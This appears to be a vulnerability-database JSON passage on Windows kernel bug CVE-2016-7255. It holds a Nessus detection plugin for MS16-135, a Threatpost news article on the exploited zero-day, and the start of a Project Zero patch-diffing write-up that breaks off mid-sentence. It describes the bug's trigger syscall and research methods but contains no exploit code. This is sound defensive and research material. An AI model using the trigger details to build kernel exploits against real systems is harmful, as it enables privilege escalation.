"cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-11-08T00:00:00", "title": "MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7246", "CVE-2016-7218", "CVE-2016-7214", "CVE-2016-7255", "CVE-2016-7215"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS16-135.NASL", "href": "https://www.tenable.com/plugins/nessus/94636", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94636);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/11/15 20:50:32\");\n\n script_cve_id(\n \"CVE-2016-7214\",\n \"CVE-2016-7215\",\n \"CVE-2016-7218\",\n \"CVE-2016-7246\",\n \"CVE-2016-7255\"\n );\n script_bugtraq_id(\n 93991,\n 94000,\n 94004,\n 94063,\n 94064\n );\n script_xref(name:\"MSFT\", value:\"MS16-135\");\n script_xref(name:\"MSKB\", value:\"3198234\");\n script_xref(name:\"MSKB\", value:\"3194371\");\n script_xref(name:\"MSKB\", value:\"3197867\");\n script_xref(name:\"MSKB\", value:\"3197868\");\n script_xref(name:\"MSKB\", value:\"3197873\");\n script_xref(name:\"MSKB\", value:\"3197874\");\n script_xref(name:\"MSKB\", value:\"3197876\");\n script_xref(name:\"MSKB\", value:\"3197877\");\n script_xref(name:\"MSKB\", value:\"3198585\");\n script_xref(name:\"MSKB\", value:\"3198586\");\n script_xref(name:\"MSKB\", value:\"3200970\");\n script_xref(name:\"IAVA\", value:\"2016-A-0322\");\n\n script_name(english:\"MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135)\");\n script_summary(english:\"Checks the version of ntoskrnl.exe or the installed rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows kernel that allows a local attacker, via a\n specially crafted application, to bypass the Address\n Space Layout Randomization (ASLR) feature and retrieve\n the memory address of a kernel object. (CVE-2016-7214)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Windows kernel-mode driver due to improper handling\n of objects in memory. A local attacker can exploit\n these, via a specially crafted application, to execute\n arbitrary code in kernel mode. (CVE-2016-7215,\n CVE-2016-7246, CVE-2016-7255)\n\n - An information disclosure vulnerability exists in the\n bowser.sys kernel-mode driver due to improper handling\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to disclose\n sensitive information. (CVE-2016-7218)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2016/ms16-135\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS16-135';\nkbs = make_list(\n '3198234',\n '3194371',\n '3197867',\n '3197868',\n '3197873',\n '3197874',\n '3197876',\n '3197877',\n '3198585',\n '3198586',\n '3200970'\n\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Vista / 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"win32k.sys\", version:\"6.0.6002.24029\", min_version:\"6.0.6002.23000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3198234\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"win32k.sys\", version:\"6.0.6002.19706\", min_version:\"6.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3198234\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"bowser.sys\", version:\"6.0.6002.24021\", min_version:\"6.0.6002.23000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"3194371\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"bowser.sys\", version:\"6.0.6002.19698\", min_version:\"6.0.6002.18000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"3194371\") ||\n # 8.1 / 2012 R2\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date: \"11_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3197873, 3197874)) ||\n # 2012\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date: \"11_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3197876, 3197877)) ||\n # 7 / 2008 R2\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date: \"11_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3197867, 3197868)) ||\n # 10 (1507)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date: \"11_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3198585)) ||\n # 10 (1511)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10586\",\n rollup_date: \"11_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3198586)) ||\n # 10 (1607)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"14393\",\n rollup_date: \"11_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3200970))\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T22:54:27", "bulletinFamily": "info", "cvelist": ["CVE-2016-7199", "CVE-2016-7209", "CVE-2016-7214", "CVE-2016-7215", "CVE-2016-7218", "CVE-2016-7246", "CVE-2016-7255"], "description": "Microsoft followed through and today patched a zero-day vulnerability being exploited in public attacks that was [disclosed by Google researchers](<https://threatpost.com/google-reveals-windows-kernel-zero-day-under-attack/121689/>) nine days ago.\n\nThe victims have yet to have been identified, but [Microsoft did accuse the Sofacy APT gang](<https://threatpost.com/microsoft-says-russian-apt-group-behind-zero-day-attacks/121722/>) of carrying out the attacks. Sofacy is generally thought to have ties to Russian military intelligence and its targets are strategic, such as government and diplomatic agencies, military and defense contractors, and public policy think-tanks.\n\nGoogle\u2019s disclosure on Oct. 31 came 10 days after it privately reported the vulnerability to Microsoft, along with a Flash zero day to Adobe also used in these attacks.\n\nAdobe patched the Flash vulnerability with an [emergency update](<https://threatpost.com/adobe-patches-flash-zero-day-under-attack/121567/>) released on Oct. 26, but Microsoft failed to publicly acknowledge the bug until only after Google publicly disclosed it. Google\u2019s internal policy gives vendors seven days to publicly report or patch vulnerabilities being actively exploited.\n\nGoogle said the vulnerability is a local privilege escalation in the Windows kernel that leads to a sandbox escape.\n\n\u201cIt can be triggered via the win32k.sys system call NtSetWindowLongPtr() for the index GWLP_ID on a window handle with GWL_STYLE set to WS_CHILD,\u201d Google\u2019s Neel Mehta and Billy Leonard said in their [disclosure](<https://security.googleblog.com/2016/10/disclosing-vulnerabilities-to-protect.html>).\n\nThe attackers chained this bug and the Flash zero day in order to get on targeted computers. The sandbox escape allows the attacker to run code in kernel mode.\n\n\u201cMicrosoft implemented new exploit mitigations in the Windows 10 Anniversary Update version of the win32k kernel component,\u201d Microsoft said in its bulletin, [MS16-135](<https://technet.microsoft.com/library/security/MS16-135>). \u201cThese Windows 10 Anniversary Update mitigations, which were developed based on proactive internal research, stop all observed in-the-wild instances of this exploit.\u201d\n\nMS16-135 also patched two other elevation of privilege vulnerabilities in the Windows kernel (CVE-2016-7215 and CVE-2016-7246), as well as an information disclosure bug in the kernel that opens the door for a kernel ASLR bypass (CVE-2016-7214), and a separate information disclosure bug in the Windows browser.sys kernel-mode driver (CVE-2016-7218).\n\nSix of the 14 bulletins put out by Microsoft today are rated critical. One, [MS16-132](<https://technet.microsoft.com/library/security/MS16-132>), included another vulnerability under attack in the Windows Graphics Component. Microsoft said a remote code execution Open Type Font vulnerability was patched in the Windows font library.\n\nThat bulletin patched three other flaws, including an information disclosure flaw in Open Type Font, specifically in the ATMFD component, which leaks enough information to carry out a further compromise. Also addressed was a remote code execution memory corruption vulnerabilities in Windows Animation Manager and Windows Media Foundation.\n\nMicrosoft also provided cumulative updates for its browsers, Edge and Internet Explorer. The Edge update, [MS16-129](<https://technet.microsoft.com/library/security/MS16-129>), patched 17 vulnerabilities, most of which lead to remote code execution. Two of the flaws, CVE-2016-7209 and CVE-2016-7199, were publicly disclosed, Microsoft said, but not used in in-the-wild attacks. The second disclosed bug was also patched in the Internet Explorer update, [MS16-142](<https://technet.microsoft.com/library/security/MS16-142>), which patched seven CVEs.\n\n[MS16-130](<https://technet.microsoft.com/library/security/MS16-130>) patched three critical Windows bugs, a remote code execution flaw in the way Windows\u2019 image file loading handles malformed image files, along with two elevation of privilege flaws in Windows IME and Windows Task Scheduler.\n\nAnother remote code execution vulnerability was addressed in [MS16-131](<https://technet.microsoft.com/library/security/MS16-131>) in the Microsoft Video Control component. The remaining critical bulletin is the Adobe Flash Player update for IE and Edge; Adobe released an update today for Flash Player patching [nine remote code execution flaws](<https://threatpost.com/adobe-patches-nine-code-execution-flaws-in-flash-player/121839/>) in the software.\n\nThough rated important by Microsoft, an Office bulletin, [MS16-133](<https://technet.microsoft.com/library/security/MS16-133>), also merits attention because it patches a dozen vulnerabilities including 10 that lead to remote code execution. None of the Office bugs are being publicly attacked, Microsoft said.\n\nMicrosoft also patched SQL Server, addressing a half-dozen elevation of privilege and information disclosure vulnerabilities in [MS16-136](<https://technet.microsoft.com/library/security/MS16-136>). Three of the EoP bugs are in the SQL Server RDBMS engine, along with a cross-site scripting flaw in SQL Server MDS, an information disclosure issue in SQL Analysis Services, and another EoP issue in the SQL Server Engine Server Agent.\n\n\u201cThe top priority for most administrators will be to quickly deploy fixes for browsers, graphics components, and Office. All of these components are affected by one or more code execution vulnerabilities Microsoft has classified as highly exploitable,\u201d said Craig Young, security researcher at Tripwire. \u201cThese are of the highest priority due to the fact that the vulnerabilities can potentially be triggered through normal web browsing activities giving an external attacker a way into networks.\u201d\n\nThe remaining bulletins are also rated important:\n\n * [MS16-134](<https://technet.microsoft.com/library/security/MS16-134>) patches 10 elevation of privilege flaws in the Windows Common Log File System (CLFS)\n * [MS16-137](<https://technet.microsoft.com/library/security/MS16-137>) patches three vulnerabilities in Windows NTLM, Virtual Secure Mode and Local Security Authority Subsystem Service\n * [MS16-138](<https://technet.microsoft.com/library/security/MS16-138>) patches four elevation of privilege vulnerabilities in the Windows Virtual Hard Disk Driver\n * [MS16-139](<https://technet.microsoft.com/library/security/MS16-139>) patches a local Windows kernel elevation of privilege flaw in how the Windows Kernel API enforces permissions\n * [MS16-140](<https://technet.microsoft.com/library/security/MS16-140>) patches a security feature bypass in the Windows Secure Boot component; an attacker could disable code integrity checks and allow test-signed executables and drivers to be loaded.\n", "modified": "2016-11-08T20:23:12", "published": "2016-11-08T14:57:26", "id": "THREATPOST:F10810414F1898BE0159A069C1B719B2", "href": "https://threatpost.com/microsoft-patches-zero-day-disclosed-by-google/121851/", "type": "threatpost", "title": "Microsoft Patches Zero Day Disclosed by Google", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "googleprojectzero": [{"lastseen": "2020-12-14T19:22:44", "bulletinFamily": "info", "cvelist": ["CVE-2016-7255", "CVE-2019-1362", "CVE-2019-13720", "CVE-2019-1433", "CVE-2019-1458", "CVE-2019-1468", "CVE-2019-3568"], "description": "Posted by Maddie Stone, Project Zero\n\n# INTRODUCTION\n\nI\u2019m really interested in 0-days exploited in the wild and what we, the security community, can learn about them to make 0-day hard. I explained some of Project Zero\u2019s ideas and goals around in-the-wild 0-days in a [November blog post](<https://googleprojectzero.blogspot.com/2019/11/bad-binder-android-in-wild-exploit.html>). \n\n** \n**\n\nOn December\u2019s Patch Tuesday, I was immediately intrigued by CVE-2019-1458, a Win32k Escalation of Privilege (EoP), said to be exploited in the wild and discovered by Anton Ivanov and Alexey Kulaev of Kaspersky Lab. Later that day, Kaspersky published a [blog post](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>) on the exploit. The blog post included details about the exploit, but only included partial details on the vulnerability. My end goal was to do variant analysis on the vulnerability, but without full and accurate details about the vulnerability, I needed to do a root cause analysis first. I tried to get my hands on the exploit sample, but I wasn't able to source a copy.\n\n** \n**\n\nWithout the exploit, I had to use binary patch diffing in order to complete root cause analysis. Patch diffing is an often overlooked part of the perpetual vulnerability disclosure debate, as vulnerabilities become public knowledge as soon as a software update is released, not when they are announced in release notes. Skilled researchers can quickly determine the vulnerability that was fixed by comparing changes in the codebase between old and new versions. If the vulnerability is not publicly disclosed before or at the same time that the patch is released, then this could mean that the researchers who undertake the patch diffing effort could have more information than the defenders deploying the patches.\n\n** \n**\n\nWhile my patch diffing adventure did not turn out with me analyzing the bug I intended (more on that to come!), I do think my experience can provide us in the community with a data point. It\u2019s rarely possible to reference hard timelines for how quickly sophisticated individuals can do this type of patch-diffing work, so we can use this as a test. I acknowledge that I have significant experience in reverse engineering, however I had no previous experience at all doing research on a Windows platform, and no knowledge of how the operating system worked. It took me three work weeks from setting up my first VM to having a working crash proof-of-concept for a vulnerability. This can be used as a data point (likely a high upper bound) for the amount of time it takes for individuals to understand a vulnerability via patch diffing and to create a working proof-of-concept crasher, since most individuals will have prior experience with Windows.\n\n** \n**\n\nBut as I alluded to above, it turns out I analyzed and wrote a crash POC for not CVE-2019-1458, but actually [CVE-2019-1433](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1433>). I wrote this whole blog post back in January, went through internal reviews, then sent the blog post to Microsoft to preview (we provide vendors with 24 hour previews of blog posts). That\u2019s when I learned I\u2019d analyzed CVE-2019-1433, not CVE-2019-1458. At the beginning of March, Piotr Florczyk published a [detailed root cause analysis and POC for the \u201creal\u201d CVE-2019-1458 bug](<https://github.com/piotrflorczyk/cve-2019-1458_POC>). With the \u201creal\u201d root cause analysis for CVE-2019-1458 now available, I decided that maybe this blog post could still be helpful to share what my process was to analyze Windows for the first time and where I went wrong.\n\n** \n**\n\nThis blog post will share my attempt to complete a root cause analysis of CVE-2019-1458 through binary patch diffing, from the perspective of someone doing research on Windows for the first time. This includes the process I used, a technical description of the \u201cwrong\u201d, but still quite interesting bug I analyzed, and some thoughts on what I learned through this work, such as where I went wrong. This includes the root cause analysis for CVE-2019-1433, that I originally thought was the vulnerability for the in the wild exploit. As far as I know, the vulnerability detailed in this blog post was not exploited in the wild.\n\n# MY PROCESS\n\nWhen the vulnerability was disclosed on December\u2019s Patch Tuesday, I was immediately interested in the vulnerability. As a part of my new role on Project Zero where I\u2019m leading efforts to study 0-days used in the wild, I was really interested in learning Windows. I had never done research on a Windows platform and didn\u2019t know anything about Windows programming or the kernel. This vulnerability seemed like a great opportunity to start since:\n\n 1. Complete details about the specific vulnerability weren't available,\n\n 2. It affected both Windows 7 and Windows 10, and\n\n 3. The vulnerability is in win32k which is a core component of the Windows kernel.\n\n** \n**\n\nI spent a few days trying to get a copy of the exploit, but wasn\u2019t able to. Therefore I decided that binary patch-diffing would be my best option for figuring out the vulnerability. I was very intrigued by this vulnerability because it affected Windows 10 in addition to Windows 7. However, James Forshaw advised me to patch diff the Windows 7 win32k.sys files rather than the Windows 10 versions. He suggested this for a few reasons:\n\n 1. The signal to noise ratio is going to be much higher for Windows 7 rather than Windows 10. This \u201cnoise\u201d includes things like [Control Flow Guard](<https://docs.microsoft.com/en-us/windows/win32/secbp/control-flow-guard>), more inline instrumentation calls, and \u201cweirder\u201d compiler settings. \n\n 2. On Windows 10, win32k is broken up into a few different files: win32k.sys, win32kfull.sys, win32kbase.sys, rather than a single monolithic file.\n\n 3. Kaspersky\u2019s blog post stated that not all Windows 10 builds were affected.\n\n** \n**\n\nI got to work creating a Windows 7 testing environment. I created a Windows 7 SP1 x64 VM and then started the long process of patching it up until September 2019 (the last available update prior to the December 2019 update where the vulnerability was supposedly fixed). This took about a day and a half as I worked to find the right order to apply the different updates.\n\n** \n**\n\nTurns out that me thinking that September 2019 was the last available update prior to December 2019 would be one of the biggest reasons that I patch-diffed the wrong bug. I thought that September 2019 was the latest because it was the only update shown to me, besides December 2019, when I clicked \u201cCheck for Updates\u201d within the VM. Because I was new to Windows, I didn\u2019t realize that not all updates may be listed in the Windows Update window or that updates could also be downloaded from the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Home.aspx>). When Microsoft told me that I had analyzed the wrong vulnerability, that\u2019s when I realized my mistake. CVE-2019-1433, the vulnerability I analyzed, was patched in November 2019, not December 2019. If I had patch-diffed November to December, rather than September to December, I wouldn\u2019t have gotten mixed up.\n\n** \n**\n\nOnce the Windows 7 VM had been updated to Sept 2019, I made a copy of its C:\\Windows\\System32\\win32k.sys file and snapshotted the VM. I then updated it to the most recent patch, December 2019, where the vulnerability in question was fixed. I then snapshotted the VM again and saved off the copy of win32k.sys. These two copies of win32k.sys are the two files I diffed in my patch diffing analysis.\n\n** \n**\n\nWin32k is a core kernel driver that is responsible for the windows that are shown as a part of the GUI. In later versions of Windows, it\u2019s broken up into multiple files rather than the single file that it is on Windows 7. Having only previously worked on the Linux/Android and RTOS kernels, the GUI aspects took a little bit of time to wrap my head around.\n\n** \n**\n\nOn James Foreshaw\u2019s recommendation, I cloned my VM so that one VM would run [WinDbg](<https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/getting-started-with-windbg--kernel-mode->) and debug the other VM. This allows for kernel debugging.\n\n** \n**\n\nNow that I had a copy of the supposed patched and supposed vulnerable versions of win32k.sys, it\u2019s time to start patch diffing.\n\n## PATCH DIFFING WINDOWS 7 WIN32K.SYS\n\nI decided to use BinDiff to patch diff the two versions of win32k. In October 2019, I did a comparison on the different binary diffing tools available [[video](<https://thecyberwire.com/stories/Maddie-Stone-Whatsup-with-WhatsApp-A-Detailed-Walk-Through-of-Reverse-Engineering-CVE-2019-3568.html>), [slides](<https://github.com/maddiestone/ConPresentations/raw/master/Jailbreak2019.WhatsUpWithWhatsApp.pdf>)], and for me, BinDiff worked best \u201cout of the box\u201d so I decided to at least start with that again.\n\n** \n**\n\nI loaded both files into IDA and then ran BinDiff between the two versions of win32k. To my pleasant surprise, there were only 23 functions total in the whole file/driver that had changed from one version to another. In addition, there were only two new functions added in the December 2019 file that didn\u2019t exist in September. This felt like a good sign: 23 functions seemed like even in the worst case, I could look at all of them to try and find the patched vulnerability. (Between the November and December 2019 updates only 5 functions had changed, which suggests the diffing process could have been even faster.)\n\n \n\n\n[](<https://1.bp.blogspot.com/-aVhnHuLjSCo/XoYOV0ev26I/AAAAAAAAPbw/atN5FMEnaS0CkZghfKU1LjoNB1ot9LoggCNcBGAsYHQ/s1600/1_Bindiff-noSymbols.png>)\n\n \n\n\nOriginal BinDiff Matched Functions of win32k.sys without Symbols\n\n** \n**\n\nWhen I started the diff, I didn\u2019t realize that the Microsoft Symbol Server was a thing that existed. I learned about the Symbol Server and was told that I could easily get the symbols for a file by running the following command in WinDbg: x win32k!*. I still hadn\u2019t realized that IDA Pro had the capability to automatically get the symbols for you from a PDB file, even if you aren\u2019t running IDA on a Windows computer. So after running the WinDBG command, I copied all of the output to a file, rebased my IDA Pro databases to the same base address and then would manually rename functions as I was reversing based on the symbols and addresses in the text file. About a week into this escapade, I learned how to modify the IDA configuration file to have my IDA Pro instance, running on Linux, connect to my Windows VM to get the symbols.\n\n** \n**\n\n[](<https://1.bp.blogspot.com/-GW0vp_mg4m0/Xpto5bZmk8I/AAAAAAAAPhs/9tdNfmFEo7oux9cM1WD1df0BNg_P7hG8gCNcBGAsYHQ/s1600/2_Bindiff-Symbols%2B%25281%2529.png>)\n\n \n\n\nBinDiff Matched Function of win32k.sys with Symbols\n\n** \n**\n\nWhat stood out at first when I looked at BinDiff was that none of the functions called out in Kaspersky\u2019s blog post had been changed: not DrawSwitchWndHilite, CreateBitmap, SetBitmapBits, nor NtUserMessageCall. Since I didn\u2019t have a strong indicator for a starting point, I instead tried to rule out functions that likely wouldn\u2019t be the change that I was looking for. I first searched for function names to determine if they were a part of a different blog post or CVE. Then I looked through all of the CVEs claimed to affect Windows 7 that were fixed in the December Bulletin and matched them up. Through this I ruled out the following functions:\n\n * CreateSurfacePal \\- [CVE-2019-1362](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1362>)\n\n * RFONTOBJ::bInsterGlyphbitsLookaside, xInsertGlyphbitsRFONTOBJ \\- [CVE-2019-1468](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1468>)\n\n** \n**\n\n## EXPLORING THE WRONG CHANGES\n\nAt this point I started scanning through functions to try and understand their purpose and look at the changes that were made. GreGetStringBitmapW caught my eye because it had \u201cbitmap\u201d in the name and Kaspersky\u2019s blog post talked about the use of bitmaps.\n\n** \n**\n\nThe changes to GreGetStringBitmapW didn\u2019t raise any flags: one of the changes had no functional impact and the other was sending arguments to another function, a function that was also listed as having changed in this update. This function had no public symbols available and is labeled as vuln_sub_FFFFF9600028F200 in the Bindiff image above. In the Dec 2019 win32k.sys its offset from base address is 0x22F200.\n\n** \n**\n\n[](<https://1.bp.blogspot.com/-SliC7FMJvbA/Xpto5X5btDI/AAAAAAAAPhk/2_35zFpN7AMMbQCMSEzrikeN2bZpmc4ewCNcBGAsYHQ/s1600/3_Bindiff%2Bfor%2Bvuln%2Bfunction%2B%25281%2529.png>)\n\n** \n**\n\nAs shown by the BinDiff flow graph above, there is a new block of code added in the Dec 2019 version of win32k.sys. The Dec 2019 added argument checking before using that argument when calculating where to write to a buffer. This made me think that this was a vulnerability in contention: it\u2019s called from a function with bitmap in the name and appears that there would be a way to overrun a buffer.\n\n** \n**\n\nI decided to keep reversing and spent a few days on this change. I was getting deep down in the rabbit hole though and had to remember that the only tie I had between this function and the details known about the in-the-wild exploit was that \u201cbitmap\u201d was in the name. I needed to determine if this function was even called during the calls mentioned in the Kaspersky blog post. I followed cross-references to determine how this function could be called.\n\n** \n**\n\n[](<https://1.bp.blogspot.com/-mB6GU5FDVxc/Xpto5V4kkFI/AAAAAAAAPho/W7W9o3LFX2oM2PTjgcsPXBeAEJ05JY17wCNcBGAsYHQ/s1600/4_Call%2Bgraph%2Bto%2Bvuln_sub%2B%25281%2529.png>)\n\n \n\n\n** \n**\n\nThe Nt prefix on function names means that the function is a syscall. The Gdi in NtGdiGetStringBitmapW means that the user-mode call is in gdi32.dll. Mateusz Jurczyk provides a table of Windows syscalls [here](<https://j00ru.vexillium.org/syscalls/win32k/64/>). Therefore, the only way to trigger this function is through a syscall to NtGdiGetStringBitmapW. In gdi32.dll, the only call to NtGdiGetStringBitmapW is GetStringBitmapA, which is exported.\n\n** \n**\n\nTracing this call path and realizing that none of the functions mentioned in the Kaspersky blog post called this function made me realize that it was pretty unlikely that this was the vulnerability. However, I decided to dynamically double check that this function wouldn\u2019t be called when calling the functions listed in the blog post or trigger the task switch window.\n\n** \n**\n\nI downloaded Visual Studio into my Windows 7 VM and wrote my first Windows Desktop app, following [this guide](<https://docs.microsoft.com/en-us/cpp/windows/walkthrough-creating-windows-desktop-applications-cpp?view=vs-2019>). Once I had a working \u201cHello, World\u201d, I began to add calls to the functions that are mentioned in the Kaspersky blog post: Creating the \u201cSwitch\u201d window, CreateBitmap, SetBitmapBits, NtUserMessageCall, and half-manually/half-programmatically trigger the task-switch window, etc. I set a kernel breakpoint in Windbg on the function of interest and then ran all of these. The function was never triggered, confirming that it was very unlikely this was the vulnerability of interest.\n\n** \n**\n\nI then moved on to GreAnimatePalette. When you trigger the task switch window, it draws a new window onto the screen and moves the \u201chighlight\u201d to the different windows each time you press tab. I thought that, \u201cSure, that could involve animating a palette\u201d, but I learned from last time and started with trying to trigger the call in WinDbg instead. I found that it was never called in the methods that I was looking at so I didn\u2019t spend too long and moved on.\n\n** \n**\n\n## NARROWING IT DOWN TO xxxNextWindow and xxxKeyEvent\n\nAfter these couple of false starts, I decided to change my process. Instead of starting with the functions in the diff, I decided to start at the function named in Kaspersky\u2019s blog: DrawSwitchWndHilite. I searched the cross-references graph to DrawSwitchWndHilite for any functions listed in the diff as having been changed.\n\n[](<https://1.bp.blogspot.com/-feXJTEAgl44/Xpto6OfKniI/AAAAAAAAPhw/jYsbKf5Cbf4f2pMxfw4p84PjMYyoaVmrACNcBGAsYHQ/s1600/5_Cross-refs%2Bto%2BDrawSwitchWndHilite%2B%25281%2529.png>)\n\n** \n**\n\nAs shown in the call graph above, xxxNextWindow is two calls above DrawSwitchWndHilite. When I looked at xxxNextWindow, I then saw that xxxNextWindow is only called by xxxKeyEvent and all of the changes in xxxKeyEvent surrounded the call to xxxNextWindow. These appeared to be the only functions in the diff that lead to a call to DrawSwitchWndHilite so I started reversing to understand the changes.\n\n** \n**\n\n## REVERSING THE VULNERABILITY\n\nI had gotten symbols for the function names in my IDA databases, but for the vast majority of functions, this didn\u2019t include type information. To begin finding type information, I started googling for different function names or variable names. While it didn\u2019t have everything, ReactOS was one of the best resources for finding type information, and most of the structures were already in IDA.\n\n** \n**\n\nFor example, when looking at xxxKeyEvent, I saw that in one case, the first argument to xxxNextWindow is gpqForeground. When I googled for gpqForeground, ReactOS showed me that this variable has type tagQ *. Through this, I also realized that Windows uses a convention for naming variables where the type is abbreviated at the beginning of the name. For example: gpqForeground \u2192 global, pointer to queue (tagQ *), gptiCurrent \u2192 global, pointer to thread info (tagTHREADINFO *).\n\n** \n**\n\nThis was important for the modification to xxxNextWindow. There was a single line change between September and December to xxxNextWindow. The change checked a single bit in the structure pointed to by arg1. If that bit is set, the function will exit in the December version. If it\u2019s not set, then the function proceeds, using arg1. Once I knew that the type of the first argument was tagQ *, I used WinDbg and/or IDA to see its structure. The command in WinDbg is dt win32k!tagQ.\n\n** \n**\n\nAt this point, I was pretty sure I had found the vulnerability (\ud83d\ude09), but I needed to prove it. This involved about a week more of reversing, reading, debugging, wanting to throw my computer out the window, and getting intrigued by potential vulnerabilities that were not this vulnerability. As a side note, for the reversing, I found that the HexRays decompiler was great for general triage and understanding large blocks of code, but for the detailed understanding necessary (at least for me) for writing a proof-of-concept (POC), I mainly used the disassembly view.\n\n## RESOURCES\n\nHere are some of the resources that were critical for me:\n\n * \u201cKernel Attacks Through User- Mode Callbacks\u201d Blackhat USA 2011 talk by Tarjei Mandt [[slides](<http://mista.nu/research/mandt-win32k-slides.pdf>), video]\n\n * I learned about thread locking, assignment locking, and user-mode callbacks.\n\n * \u201cOne Bit To Rule A System: Analyzing CVE-2016-7255 Exploit In The Wild\u201d by Jack Tang, Trend Micro Security Intelligence 